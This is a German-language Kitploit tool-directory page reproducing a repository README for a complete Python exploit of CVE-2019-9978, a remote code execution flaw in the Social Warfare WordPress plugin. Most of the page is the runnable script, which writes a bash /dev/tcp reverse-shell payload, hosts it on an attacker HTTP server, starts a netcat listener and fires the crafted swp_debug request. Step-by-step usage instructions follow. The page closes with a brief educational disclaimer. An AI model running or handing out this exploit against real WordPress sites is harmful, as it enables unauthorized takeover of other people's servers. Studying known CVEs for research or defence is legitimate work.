Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-9978-Social-Warfare-WordPress-Plugin-RCE — Der Parameter `swp_debug` in `admin-post.php` ermöglicht es entfernten Angreifern, externe Dateien einzubinden, die schädlichen PHP-Code enthalten, welcher auf dem Server ausgeführt wird. Durch die Bereitstellung einer manipulierten URL, die einen Reverse-Shell-Payload hostet, kann ein Angreifer eine Befehlsausführung erlangen. | Kitploit
Tools/GitHubGitHub/housma/cve-2019-9978-social-warfare-wordpress-plugin-rce
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed TeamingRemote-Access-Tool

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

GitHub
housma/cve-2019-9978-social-warfare-wordpress-plugin-rce

CVE-2019-9978-Social-Warfare-WordPress-Plugin-RCE

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Der Parameter `swp_debug` in `admin-post.php` ermöglicht es entfernten Angreifern, externe Dateien einzubinden, die schädlichen PHP-Code enthalten, welcher auf dem Server ausgeführt wird. Durch die Bereitstellung einer manipulierten URL, die einen Reverse-Shell-Payload hostet, kann ein Angreifer eine Befehlsausführung erlangen.

Teilen

CVE-2019-9978 – Social Warfare WordPress Plugin RCE

Dieses Repository enthält einen funktionierenden Python-Exploit für CVE-2019-9978, eine Remote Code Execution-Schwachstelle im Social Warfare Plugin für WordPress (Version <= 3.5.2).

Beschreibung

Der Parameter swp_debug in admin-post.php erlaubt es entfernten Angreifern, externe Dateien mit schädlichem PHP-Code einzubinden, die auf dem Server ausgeführt werden. Durch die Angabe einer präparierten URL, die einen Reverse-Shell-Payload hostet, kann ein Angreifer die Befehlsausführung erlangen.

Exploit-Funktionen

  • Hostet einen PHP-Payload mit Pythons integriertem HTTP-Server.
  • Sendet einen schädlichen swp_url-Parameter, um RCE auszulösen.
  • Startet einen Netcat-Listener, um die Reverse Shell abzufangen.
  • Schreibt den Payload automatisch mit der korrekten Escapierung für eine erfolgreiche Codeausführung.

Anforderungen

  • Python 3.x
  • Netcat
  • Lokale DNS-Auflösung für die Zieldomain (z.B. example.com auf die Ziel-IP gemappt)

Exploit-Code

root@kitploit:~
#!/usr/bin/env python3

import requests
import threading
import http.server
import socketserver
import os
import subprocess
import time

# --- Config ---
TARGET_URL = "http://example.com"
ATTACKER_IP = "192.168.26.130"  # Change to your attack box IP
HTTP_PORT = 8000
LISTEN_PORT = 4447
PAYLOAD_FILE = "payload.txt"

def create_payload():
    """Write exact reverse shell payload using valid PHP syntax"""
    payload = f'<pre>system("bash -c \\"bash -i >& /dev/tcp/{ATTACKER_IP}/{LISTEN_PORT} 0>&1\\"")</pre>'
    with open(PAYLOAD_FILE, "w") as f:
        f.write(payload)
    print(f"[+] Payload written to {PAYLOAD_FILE}")

def start_http_server():
    """Serve payload over HTTP"""
    handler = http.server.SimpleHTTPRequestHandler
    with socketserver.TCPServer(("", HTTP_PORT), handler) as httpd:
        print(f"[+] HTTP server running at port {HTTP_PORT}")
        httpd.serve_forever()

def start_listener():
    """Start Netcat listener"""
    print(f"[+] Listening on port {LISTEN_PORT} for reverse shell...")
    subprocess.call(["nc", "-lvnp", str(LISTEN_PORT)])

def send_exploit():
    """Trigger the exploit with vulnerable parameter"""
    payload_url = f"http://{ATTACKER_IP}:{HTTP_PORT}/{PAYLOAD_FILE}"
    exploit = f"{TARGET_URL}/wp-admin/admin-post.php?swp_debug=load_options&swp_url={payload_url}"
    print(f"[+] Sending exploit: {exploit}")
    try:
        requests.get(exploit, timeout=5)
    except requests.exceptions.RequestException:
        pass

def main():
    create_payload()

    # Start web server in background
    http_thread = threading.Thread(target=start_http_server, daemon=True)
    http_thread.start()
    time.sleep(2)  # Give server time to start

    # Start listener in background
    listener_thread = threading.Thread(target=start_listener)
    listener_thread.start()
    time.sleep(1)

    # Send the malicious request
    send_exploit()

if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print("[-] Interrupted by user.")

Verwendung

  1. Aktualisieren Sie ATTACKER_IP und LISTEN_PORT auf die IP Ihres Rechners und den gewünschten Port.
  2. Stellen Sie sicher, dass die Zieladresse example.com zur korrekten IP aufgelöst wird.
  3. Führen Sie das Skript aus:
root@kitploit:~
python3 exploit.py
  1. Fangen Sie die Reverse Shell in Ihrem Listener.

Referenzen

  • https://nvd.nist.gov/vuln/detail/CVE-2019-9978
  • https://github.com/hash3liZer/CVE-2019-9978

Haftungsausschluss

Dieser Exploit wird nur zu Bildungszwecken bereitgestellt. Verwenden Sie ihn nicht ohne ausdrückliche Erlaubnis auf einem System, das Ihnen nicht gehört.

Tool herunterladen